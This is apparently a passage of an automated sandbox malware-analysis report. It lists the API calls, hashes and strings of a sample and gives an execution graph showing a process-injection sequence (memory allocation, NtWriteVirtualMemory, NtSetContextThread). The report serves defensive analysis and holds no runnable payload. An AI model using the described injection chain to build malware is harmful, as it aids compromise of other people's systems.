                                                                                                                          • Opcode Fuzzy Hash: 0d38f4751805db27582d5cf81cda9713cc2f7bc7b29633d887c1cd8b950a6990
                                                                                                                          • Instruction Fuzzy Hash: 29E092733803043AE33065AD9C03FE7B79CCB81B65F55002AFA4DEB2C1D599F84142A8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040CFC2,0040CFC2,?,00000000,?,?), ref: 00418A80
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3899507212-0
                                                                                                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                          • Instruction ID: 6b795ac81b365ad13cf9f2a9b204a9737006b755962b409e964d21a2d06fa60d
                                                                                                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                          • Instruction Fuzzy Hash: 62E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0857241C934E950CBF5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • SetErrorMode.KERNEL32(00008003,?,?,00407C83,?), ref: 0040D45B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorMode
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2340568224-0
                                                                                                                          • Opcode ID: 72ea501ca32a20037376517925c6f4de5f815541c480a40789b399fa1f4469b1
                                                                                                                          • Instruction ID: d547e908a51b87359fd4076440c656bd412a0d374559f6f18339af9eb79bce8b
                                                                                                                          • Opcode Fuzzy Hash: 72ea501ca32a20037376517925c6f4de5f815541c480a40789b399fa1f4469b1
                                                                                                                          • Instruction Fuzzy Hash: 5CD05E75B403043AEB10FEB49C03FAA2B845F56744F094078F949E73C3D964D5018624
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • SetErrorMode.KERNEL32(00008003,?,?,00407C83,?), ref: 0040D45B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorMode
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2340568224-0
                                                                                                                          • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                                                                                          • Instruction ID: 1fe6c35ecaf7b81e60c5cd7bd5a726fda9ef5b7f02edb88ad12302bbb7323291
                                                                                                                          • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                                                                                          • Instruction Fuzzy Hash: CDD05E75B503042AE610BAA49C03F6632885B45B44F494064FA48A63C3D964E5008165
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true
                                                                                                                          • Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: f9b1c3d5baa712d8576f3920a6a22195b22df55cc8e5ca1eb5e32cddccdf3c1f
                                                                                                                          • Instruction ID: b72a614ce558e1e21571da05c695898a9404671f86b873140fc0323051e74c04
                                                                                                                          • Opcode Fuzzy Hash: f9b1c3d5baa712d8576f3920a6a22195b22df55cc8e5ca1eb5e32cddccdf3c1f
                                                                                                                          • Instruction Fuzzy Hash: 35B02B318024C0C7FB00EB200708B073900A7C0300F11D051D28202C0E4338D090F171
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          Strings
                                                                                                                          • ExecuteOptions, xrefs: 043D44AB
                                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 043D4507
                                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 043D454D
                                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 043D4530
                                                                                                                          • Execute=1, xrefs: 043D451E
                                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 043D4460
                                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 043D4592
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true
                                                                                                                          • Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                          • API String ID: 0-484625025
                                                                                                                          • Opcode ID: a941e7a8bfd8d5e10f1735eef23f03871194bc7f76a53457a35cc47efa4bc773
                                                                                                                          • Instruction ID: 164998e2cfb009cbd5fa558264694ca038481ccf03e989f0048a7945b839bb04
                                                                                                                          • Opcode Fuzzy Hash: a941e7a8bfd8d5e10f1735eef23f03871194bc7f76a53457a35cc47efa4bc773
                                                                                                                          • Instruction Fuzzy Hash: EF51F631A50219BAFF50AEA4EC89FEA73E8EF48304F0424A9E505A71C1E770BE45CF54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, Offset: 04330000, based on PE: true
                                                                                                                          • Associated: 0000000F.00000002.51926871418.0000000004459000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp Download File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_4330000_rundll32.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: $$@
                                                                                                                          • API String ID: 0-1194432280
                                                                                                                          • Opcode ID: 9a9ec9e6252d025120d4d81df5a3135943f264b922d29d5b8ed633d85d4319fa
                                                                                                                          • Instruction ID: ac4504ebc2e0250beeae3a86c47e8e53ed15a87907a81138e08cd08120d5397d
                                                                                                                          • Opcode Fuzzy Hash: 9a9ec9e6252d025120d4d81df5a3135943f264b922d29d5b8ed633d85d4319fa
                                                                                                                          • Instruction Fuzzy Hash: 36814DB1D002699BDB31DF54CC44BDEB6B8AF04714F1051DAE91AB7240E730AE84CFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:5.6%
                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:368
                                                                                                                          Total number of Limit Nodes:6

                                                                                                                          Graph

                                                                                                                          execution_graph 8614 229c88b 8615 229c8a6 8614->8615 8633 229bcba 8614->8633 8615->8633 8711 229f3ee 8615->8711 8617 229f4e4 LoadLibraryA 8619 229f533 8617->8619 8620 229f4c2 8620->8617 8621 229c9d5 8623 229cb1e NtAllocateVirtualMemory 8621->8623 8645 229138e 8621->8645 8623->8633 8626 229bbfe 8627 22a2acd 24 API calls 8626->8627 8628 229bc5f 8627->8628 8629 22a2acd 24 API calls 8628->8629 8631 229bc72 8629->8631 8630 22a2acd 24 API calls 8630->8645 8632 22a2acd 24 API calls 8631->8632 8632->8633 8633->8617 8806 229fcc1 GetPEB 8633->8806 8635 229f3ee LoadLibraryA GetPEB 8635->8645 8636 229b695 8636->8626 8639 229b943 NtWriteVirtualMemory 8636->8639 8638 22a14fe GetPEB 8638->8645 8641 229b9e1 8639->8641 8641->8626 8804 22a2acd 8641->8804 8642 2291320 8645->8626 8645->8630 8645->8633 8645->8635 8645->8636 8645->8638 8645->8642 8654 22a1f4c 8645->8654 8655 22a2284 8645->8655 8656 22a322b 24 API calls 8645->8656 8659 22a18ac 8645->8659 8662 22a1490 8645->8662 8706 229f3ca GetPEB 8645->8706 8707 229bd4b 8645->8707 8717 22a06a2 8645->8717 8761 22a322b 8645->8761 8808 22a23e2 8645->8808 8652 22a23e2 NtProtectVirtualMemory 8653 22a23db 8652->8653 8654->8642 8660 22a23e2 NtProtectVirtualMemory 8654->8660 8655->8652 8658 22a3190 NtSetContextThread 8656->8658 8657 22a23e2 NtProtectVirtualMemory 8657->8642 8658->8645 8659->8657 8661 22a216a 8660->8661 8663 229f3ee 2 API calls 8662->8663 8695 229138e 8663->8695 8664 229f3ee LoadLibraryA GetPEB 8664->8695 8665 22a14fe GetPEB 8665->8695 8666 22a23e2 NtProtectVirtualMemory 8666->8695 8667 22a23e2 NtProtectVirtualMemory 8668 22a23db 8667->8668 8668->8645 8669 22a1f4c 8673 22a23e2 NtProtectVirtualMemory 8669->8673 8685 2291320 8669->8685 8670 22a2284 8670->8667 8671 22a23e2 NtProtectVirtualMemory 8671->8685 8672 22a18ac 8672->8671 8674 22a216a 8673->8674 8674->8645 8675 22a06a2 25 API calls 8675->8695 8676 22a322b 25 API calls 8676->8695 8677 22a1490 25 API calls 8677->8695 8678 22a322b 25 API calls 8679 22a3190 NtSetContextThread 8678->8679 8679->8695 8680 229f4e4 LoadLibraryA 8682 229f533 8680->8682 8681 229fcc1 GetPEB 8683 229f4c2 8681->8683 8682->8645 8683->8680 8685->8645 8686 229bbfe 8687 22a2acd 25 API calls 8686->8687 8688 229bc5f 8687->8688 8689 22a2acd 25 API calls 8688->8689 8691 229bc72 8689->8691 8690 22a2acd 25 API calls 8690->8695 8692 22a2acd 25 API calls 8691->8692 8693 229bcba 8692->8693 8693->8645 8693->8680 8693->8681 8694 229bd4b 25 API calls 8694->8695 8695->8662 8695->8664 8695->8665 8695->8666 8695->8669 8695->8670 8695->8672 8695->8675 8695->8676 8695->8677 8695->8678 8695->8685 8695->8686 8695->8690 8695->8693 8695->8694 8696 229b695 8695->8696 8811 229f3ca GetPEB 8695->8811 8696->8686 8697 229b943 NtWriteVirtualMemory 8696->8697 8698 229b9e1 8697->8698 8698->8686 8699 22a2acd 25 API calls 8698->8699 8700 229ba4c 8699->8700 8700->8686 8701 22a2acd 25 API calls 8700->8701 8702 229bb07 8701->8702 8702->8686 8703 229bb84 8702->8703 8703->8685 8704 22a2acd 25 API calls 8703->8704 8705 229bbfa 8704->8705 8705->8645 8706->8645 8708 229e44c 8707->8708 8812 229bd54 8708->8812 8710 229e451 8712 229f46b 8711->8712 8713 229f4e4 LoadLibraryA 8712->8713 8714 229fcc1 GetPEB 8712->8714 8715 229f533 8713->8715 8716 229f4c2 8714->8716 8715->8621 8716->8713 8718 229fcc1 GetPEB 8717->8718 8744 229138e 8718->8744 8719 22a1490 25 API calls 8719->8744 8720 229f4e4 LoadLibraryA 8722 229f533 8720->8722 8721 229fcc1 GetPEB 8723 229f4c2 8721->8723 8722->8645 8723->8720 8725 229bbfe 8726 22a2acd 25 API calls 8725->8726 8727 229bc5f 8726->8727 8728 22a2acd 25 API calls 8727->8728 8730 229bc72 8728->8730 8729 22a2acd 25 API calls 8729->8744 8731 22a2acd 25 API calls 8730->8731 8732 229bcba 8731->8732 8732->8645 8732->8720 8732->8721 8733 229bd4b 25 API calls 8733->8744 8734 229f3ee LoadLibraryA GetPEB 8734->8744 8735 229b695 8735->8725 8738 229b943 NtWriteVirtualMemory 8735->8738 8736 22a06a2 25 API calls 8736->8744 8737 22a14fe GetPEB 8737->8744 8740 229b9e1 8738->8740 8739 22a23e2 NtProtectVirtualMemory 8739->8744 8740->8725 8742 22a2acd 25 API calls 8740->8742 8741 2291320 8741->8645 8743 229ba4c 8742->8743 8743->8725 8745 22a2acd 25 API calls 8743->8745 8744->8719 8744->8725 8744->8729 8744->8732 8744->8733 8744->8734 8744->8735 8744->8736 8744->8737 8744->8739 8744->8741 8747 22a322b 25 API calls 8744->8747 8753 22a1f4c 8744->8753 8754 22a2284 8744->8754 8755 22a322b 25 API calls 8744->8755 8758 22a18ac 8744->8758 8909 229f3ca GetPEB 8744->8909 8746 229bb07 8745->8746 8746->8725 8748 229bb84 8746->8748 8747->8744 8748->8741 8749 22a2acd 25 API calls 8748->8749 8750 229bbfa 8749->8750 8750->8645 8751 22a23e2 NtProtectVirtualMemory 8752 22a23db 8751->8752 8752->8645 8753->8741 8759 22a23e2 NtProtectVirtualMemory 8753->8759 8754->8751 8757 22a3190 NtSetContextThread 8755->8757 8756 22a23e2 NtProtectVirtualMemory 8756->8741 8757->8744 8758->8756 8760 22a216a 8759->8760 8760->8645 8787 229138e 8761->8787 8762 22a1490 25 API calls 8762->8787 8763 229f4e4 LoadLibraryA 8765 229f533 8763->8765 8764 229fcc1 GetPEB 8766 229f4c2 8764->8766 8765->8645 8766->8763 8768 229bbfe 8770 22a2acd 25 API calls 8768->8770 8769 229f3ee LoadLibraryA GetPEB 8769->8787 8771 229bc5f 8770->8771 8772 22a2acd 25 API calls 8771->8772 8774 229bc72 8772->8774 8773 22a2acd 25 API calls 8773->8787 8775 22a2acd 25 API calls 8774->8775 8776 229bcba 8775->8776 8776->8645 8776->8763 8776->8764 8777 229bd4b 25 API calls 8777->8787 8778 229b695 8778->8768 8781 229b943 NtWriteVirtualMemory 8778->8781 8779 22a06a2 25 API calls 8779->8787 8780 22a14fe GetPEB 8780->8787 8783 229b9e1 8781->8783 8782 22a23e2 NtProtectVirtualMemory 8782->8787 8783->8768 8785 22a2acd 25 API calls 8783->8785 8784 2291320 8784->8645 8786 229ba4c 8785->8786 8786->8768 8788 22a2acd 25 API calls 8786->8788 8787->8761 8787->8762 8787->8768 8787->8769 8787->8773 8787->8776 8787->8777 8787->8778 8787->8779 8787->8780 8787->8782 8787->8784 8790 22a322b 25 API calls 8787->8790 8796 22a1f4c 8787->8796 8797 22a2284 8787->8797 8798 22a322b 25 API calls 8787->8798 8801 22a18ac 8787->8801 8910 229f3ca GetPEB 8787->8910 8789 229bb07 8788->8789 8789->8768 8791 229bb84 8789->8791 8790->8787 8791->8784 8792 22a2acd 25 API calls 8791->8792 8793 229bbfa 8792->8793 8793->8645 8794 22a23e2 NtProtectVirtualMemory 8795 22a23db 8794->8795 8795->8645 8796->8784 8802 22a23e2 NtProtectVirtualMemory 8796->8802 8797->8794 8800 22a3190 NtSetContextThread 8798->8800 8799 22a23e2 NtProtectVirtualMemory 8799->8784 8800->8787 8801->8799 8803 22a216a 8802->8803 8803->8645 8911 22a2ad2 8804->8911 8807 229fcdb 8806->8807 8807->8620 8809 22a2458 NtProtectVirtualMemory 8808->8809 8809->8645 8811->8695 8813 229bdb8 8812->8813 8828 229c88b 8813->8828 8815 229bdcf 8820 229bf10 8815->8820 8887 229be04 8815->8887 8819 229e672 8819->8819 8820->8819 8822 229e463 8820->8822 8897 229bf1c 8820->8897 8821 229f3ee 8823 229f4e4 LoadLibraryA 8821->8823 8824 229fcc1 GetPEB 8821->8824 8822->8821 8876 229c7b8 8822->8876 8879 229c02c 8822->8879 8825 229f533 8823->8825 8826 229f4c2 8824->8826 8825->8710 8826->8823 8829 229c8a6 8828->8829 8847 229bcba 8828->8847 8830 229f3ee 2 API calls 8829->8830 8829->8847 8835 229c9d5 8830->8835 8831 229f4e4 LoadLibraryA 8833 229f533 8831->8833 8832 229fcc1 GetPEB 8834 229f4c2 8832->8834 8833->8815 8834->8831 8837 229cb1e NtAllocateVirtualMemory 8835->8837 8859 229138e 8835->8859 8836 22a1490 24 API calls 8836->8859 8837->8847 8840 229bbfe 8841 22a2acd 24 API calls 8840->8841 8842 229bc5f 8841->8842 8843 22a2acd 24 API calls 8842->8843 8845 229bc72 8843->8845 8844 22a2acd 24 API calls 8844->8859 8846 22a2acd 24 API calls 8845->8846 8846->8847 8847->8815 8847->8831 8847->8832 8848 229bd4b 24 API calls 8848->8859 8849 229f3ee LoadLibraryA GetPEB 8849->8859 8850 229b695 8850->8840 8853 229b943 NtWriteVirtualMemory 8850->8853 8851 22a06a2 24 API calls 8851->8859 8852 22a14fe GetPEB 8852->8859 8855 229b9e1 8853->8855 8854 22a23e2 NtProtectVirtualMemory 8854->8859 8855->8840 8857 22a2acd 24 API calls 8855->8857 8856 2291320 8856->8815 8858 229ba4c 8857->8858 8858->8840 8860 22a2acd 24 API calls 8858->8860 8859->8836 8859->8840 8859->8844 8859->8847 8859->8848 8859->8849 8859->8850 8859->8851 8859->8852 8859->8854 8859->8856 8862 22a322b 24 API calls 8859->8862 8868 22a1f4c 8859->8868 8869 22a2284 8859->8869 8870 22a322b 24 API calls 8859->8870 8873 22a18ac 8859->8873 8908 229f3ca GetPEB 8859->8908 8861 229bb07 8860->8861 8861->8840 8863 229bb84 8861->8863 8862->8859 8863->8856 8864 22a2acd 24 API calls 8863->8864 8865 229bbfa 8864->8865 8865->8815 8866 22a23e2 NtProtectVirtualMemory 8867 22a23db 8866->8867 8867->8815 8868->8856 8874 22a23e2 NtProtectVirtualMemory 8868->8874 8869->8866 8872 22a3190 NtSetContextThread 8870->8872 8871 22a23e2 NtProtectVirtualMemory 8871->8856 8872->8859 8873->8871 8875 22a216a 8874->8875 8875->8815 8877 229c88b 29 API calls 8876->8877 8878 229c7f2 8877->8878 8878->8822 8880 229c098 8879->8880 8881 229c88b 28 API calls 8880->8881 8882 229c0d9 8881->8882 8882->8822 8883 229f4e4 LoadLibraryA 8882->8883 8884 229fcc1 GetPEB 8882->8884 8885 229f533 8883->8885 8886 229f4c2 8884->8886 8885->8822 8886->8883 8888 229c88b 28 API calls 8887->8888 8895 229be29 8888->8895 8889 229f3ee 8890 229f4e4 LoadLibraryA 8889->8890 8891 229fcc1 GetPEB 8889->8891 8892 229f533 8890->8892 8893 229f4c2 8891->8893 8892->8820 8893->8890 8894 229c02c 28 API calls 8894->8895 8895->8889 8895->8894 8896 229c7b8 28 API calls 8895->8896 8896->8895 8898 229bf75 8897->8898 8899 229f3ee 8898->8899 8900 229c88b 28 API calls 8898->8900 8901 229f4e4 LoadLibraryA 8899->8901 8902 229fcc1 GetPEB 8899->8902 8906 229bfe4 8900->8906 8903 229f533 8901->8903 8904 229f4c2 8902->8904 8903->8820 8904->8901 8905 229c02c 28 API calls 8905->8906 8906->8899 8906->8905 8907 229c7b8 28 API calls 8906->8907 8907->8906 8908->8859 8909->8744 8910->8787 8943 229138e 8911->8943 8912 22a06a2 25 API calls 8912->8943 8913 229f3ee LoadLibraryA GetPEB 8913->8943 8914 22a322b 25 API calls 8914->8943 8915 22a14fe GetPEB 8915->8943 8916 22a23e2 NtProtectVirtualMemory 8916->8943 8917 22a1490 25 API calls 8917->8943 8918 22a322b 25 API calls 8919 22a3190 NtSetContextThread 8918->8919 8919->8943 8920 22a23e2 NtProtectVirtualMemory 8921 22a23db 8920->8921 8922 229f4e4 LoadLibraryA 8924 229f533 8922->8924 8923 229fcc1 GetPEB 8925 229f4c2 8923->8925 8925->8922 8926 22a1f4c 8930 2291320 8926->8930 8932 22a23e2 NtProtectVirtualMemory 8926->8932 8927 22a2284 8927->8920 8929 22a23e2 NtProtectVirtualMemory 8929->8930 8931 22a18ac 8931->8929 8933 22a216a 8932->8933 8934 229bbfe 8935 22a2acd 25 API calls 8934->8935 8936 229bc5f 8935->8936 8937 22a2acd 25 API calls 8936->8937 8939 229bc72 8937->8939 8938 22a2acd 25 API calls 8938->8943 8940 22a2acd 25 API calls 8939->8940 8941 229bcba 8940->8941 8941->8922 8941->8923 8942 229bd4b 25 API calls 8942->8943 8943->8911 8943->8912 8943->8913 8943->8914 8943->8915 8943->8916 8943->8917 8943->8918 8943->8926 8943->8927 8943->8930 8943->8931 8943->8934 8943->8938 8943->8941 8943->8942 8944 229b695 8943->8944 8954 229f3ca GetPEB 8943->8954 8944->8934 8945 229b943 NtWriteVirtualMemory 8944->8945 8946 229b9e1 8945->8946 8946->8934 8947 22a2acd 25 API calls 8946->8947 8948 229ba4c 8947->8948 8948->8934 8949 22a2acd 25 API calls 8948->8949 8950 229bb07 8949->8950 8950->8934 8951 229bb84 8950->8951 8951->8930 8952 22a2acd 25 API calls 8951->8952 8953 229bbfa 8952->8953 8954->8943 8955 229257b 8956 2292531 8955->8956 8956->8955 8957 229fcc1 GetPEB 8956->8957 8958 22a0fcb 8957->8958 8962 22a0ff7 8958->8962 8960 22a0ff2 8961 22a0ff7 33 API calls 8960->8961 8961->8960 8963 22a1002 8962->8963 8966 22a1161 8963->8966 8965 22a12f6 8965->8960 8965->8965 8998 229138e 8966->8998 8967 22a12b3 8967->8965 8968 229f4e4 LoadLibraryA 8970 229f533 8968->8970 8969 229fcc1 GetPEB 8971 229f4c2 8969->8971 8970->8965 8971->8968 8972 229f3ee LoadLibraryA GetPEB 8972->8998 8973 22a06a2 29 API calls 8973->8998 8974 22a14fe GetPEB 8974->8998 8975 22a23e2 NtProtectVirtualMemory 8975->8998 8976 22a322b 29 API calls 8976->8998 8977 22a23e2 NtProtectVirtualMemory 8978 22a23db 8977->8978 8978->8965 8979 22a1490 29 API calls 8979->8998 8980 22a1f4c 8986 22a23e2 NtProtectVirtualMemory 8980->8986 8989 2291320 8980->8989 8981 22a2284 8981->8977 8982 22a322b 29 API calls 8984 22a3190 NtSetContextThread 8982->8984 8983 22a23e2 NtProtectVirtualMemory 8983->8989 8984->8998 8985 22a18ac 8985->8983 8987 22a216a 8986->8987 8987->8965 8989->8965 8990 229bbfe 8991 22a2acd 29 API calls 8990->8991 8992 229bc5f 8991->8992 8993 22a2acd 29 API calls 8992->8993 8994 229bc72 8993->8994 8995 22a2acd 29 API calls 8994->8995 8996 229bcba 8995->8996 8996->8965 8996->8967 8996->8968 8996->8969 8997 229bd4b 29 API calls 8997->8998 8998->8972 8998->8973 8998->8974 8998->8975 8998->8976 8998->8979 8998->8980 8998->8981 8998->8982 8998->8985 8998->8989 8998->8990 8998->8996 8998->8997 8999 22a2acd 29 API calls 8998->8999 9000 229b695 8998->9000 9010 229f3ca GetPEB 8998->9010 8999->8998 9000->8990 9001 229b943 NtWriteVirtualMemory 9000->9001 9002 229b9e1 9001->9002 9002->8990 9003 22a2acd 29 API calls 9002->9003 9004 229ba4c 9003->9004 9004->8990 9005 22a2acd 29 API calls 9004->9005 9006 229bb07 9005->9006 9006->8990 9007 229bb84 9006->9007 9007->8989 9008 22a2acd 29 API calls 9007->9008 9009 229bbfa 9008->9009 9009->8965 9010->8998 9011 22938e2 9012 2293853 9011->9012 9013 229385e 9011->9013 9012->9013 9014 229c18f TerminateProcess 9012->9014

                                                                                                                          Executed Functions

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2290000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID: H+m$Sm!|$U=b$yW^g$yW^g$}#c
                                                                                                                          • API String ID: 1029625771-3546614695
                                                                                                                          • Opcode ID: b25ad30a1668fc697cae4d556328b75ab030e8700c26f52e12ad15845b43da56
                                                                                                                          • Instruction ID: a5e7999bc3269b2950af3bffea668d7d1bfbea3289595030864100dc64e4db23
                                                                                                                          • Opcode Fuzzy Hash: b25ad30a1668fc697cae4d556328b75ab030e8700c26f52e12ad15845b43da56
                                                                                                                          • Instruction Fuzzy Hash: 04B2557161434ADFDF349E78CDA53EA37A2EF55390F95412ECC8A8B648D3358986CB02
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 316 22a06a2-22a06df call 229fcc1 319 229a574-229a80f call 22a1490 call 229a760 316->319 320 22a06e5-22a073c 316->320 343 229f3ee-229f4b1 319->343 344 229a815-229a841 319->344 324 22a3b58-22a3bea call 229f0f7 320->324 325 22a0742-22a074e 320->325 327 22a374d-22a3755 325->327 330 22a3756-22a378f 327->330 330->330 334 22a3791-22a37e0 330->334 349 229f4b3-229f4e1 call 229fcc1 call 229f542 343->349 350 229f4e4-229f4e9 LoadLibraryA 343->350 347 2291320-229136d call 22910c0 344->347 348 229a847-229a8fa 344->348 348->327 354 229a900-229aac7 call 229f3ca call 22a2acd 348->354 349->350 355 229f533-229f53d call 229f542 350->355 369 229aacd-229afd9 call 229f3ee call 22a2acd call 229bd4b call 229f313 call 22a2acd 354->369 370 229bbfe-229bd48 call 22a2acd * 3 354->370 369->370 397 229afdf-229b089 369->397 370->343 397->343 399 229b08f-229b1e5 call 22a2acd 397->399 399->347 404 229b1eb-229b20b 399->404 404->370 405 229b211-229b3f2 call 229b2fb 404->405 411 229b3f8-229b554 call 22a2acd 405->411 412 229138e-2291464 call 22a37e8 405->412 411->370 421 229b55a-229b597 411->421 422 22914dd-2291502 412->422 423 2291466-22a2adc 412->423 421->370 424 229b59d-229b604 421->424 425 2291572-2291578 422->425 426 2291517-2291518 422->426 428 22a2add-22a2b37 423->428 433 229b641-229b64a 424->433 434 229b606-229b63b 424->434 429 2291579-2291594 425->429 426->425 428->412 435 22a2b3d-22a2d65 428->435 429->426 432 2291596-22915a6 429->432 436 22915a9-22915b4 432->436 437 22915b6-22915b9 432->437 433->319 438 229b650-229b66e 433->438 434->370 434->433 435->428 460 22a2d6b-22a2de9 call 22a06a2 435->460 436->437 437->429 440 22915bb-22a15f9 call 229f3ee * 2 call 22a37e8 GetPEB call 22a23e2 437->440 438->370 441 229b674-229b68f 438->441 478 22a15ff-22a16a1 440->478 479 22a1df1-22a1e3a 440->479 441->319 442 229b695-229b8b7 call 229f944 441->442 442->370 459 229b8bd-229b99b call 22a374d NtWriteVirtualMemory 442->459 472 229b9e1-229b9ea 459->472 473 22a2dec-22a2dff 460->473 472->370 475 229b9f0-229baba call 22a2acd 472->475 473->473 476 22a2e01-22a2e89 473->476 475->370 490 229bac0-229bb82 call 22a2acd 475->490 481 22a2e8c-22a2f06 476->481 478->412 486 22a16a7-22a1838 478->486 488 22a2f08-22a2fe7 call 22a322b 481->488 499 22a183c-22a184d 486->499 508 22a31cc-22a3231 488->508 509 22a2fed-22a3091 488->509 490->370 500 229bb84-229bbde 490->500 501 22a1853-22a1863 499->501 502 22a1e40-22a1e54 499->502 500->327 507 229bbe4-229bbfd call 22a2acd 500->507 501->499 506 22a1865-22a1892 501->506 505 22a1e58-22a1e6d 502->505 510 22a2172-22a2187 505->510 511 22a1e73-22a1eac 505->511 506->499 512 22a1894-22a18aa 506->512 508->319 532 22a3237-22a3269 508->532 509->508 520 22a3097-22a30ad 509->520 510->412 518 22a218d-22a218e 510->518 511->505 516 22a1eae-22a1ec5 511->516 512->499 517 22a18ac-22a1920 512->517 516->505 521 22a1ec7-22a1f29 516->521 529 22a1922-22a199c 517->529 523 22a2192-22a21a1 518->523 520->508 527 22a30b3-22a30ca 520->527 521->505 535 22a1f2f-22a1f46 521->535 524 22a23b6-22a23dd call 22a23e2 523->524 525 22a21a7-22a2219 523->525 525->412 538 22a221f-22a222a 525->538 527->508 534 22a30d0-22a3102 527->534 536 22a1a39-22a1a4c 529->536 537 22a19a2-22a19e7 529->537 532->508 539 22a326f-22a32f4 532->539 534->508 548 22a3108-22a3161 534->548 535->412 542 22a1f4c-22a1fb8 535->542 544 22a1a69-22a1a79 536->544 545 22a1a4e-22a1a68 536->545 537->544 538->523 546 22a2230-22a2244 538->546 539->508 554 22a32fa-22a332c 539->554 550 22a1fbd-22a1fd1 542->550 552 22a1a7f-22a1a96 544->552 553 22a1c2d-22a1c44 544->553 545->544 546->523 551 22a224a-22a227e 546->551 548->508 556 22a3163-22a317d 548->556 557 22a20a7-22a20e0 550->557 558 22a1fd7-22a1ff1 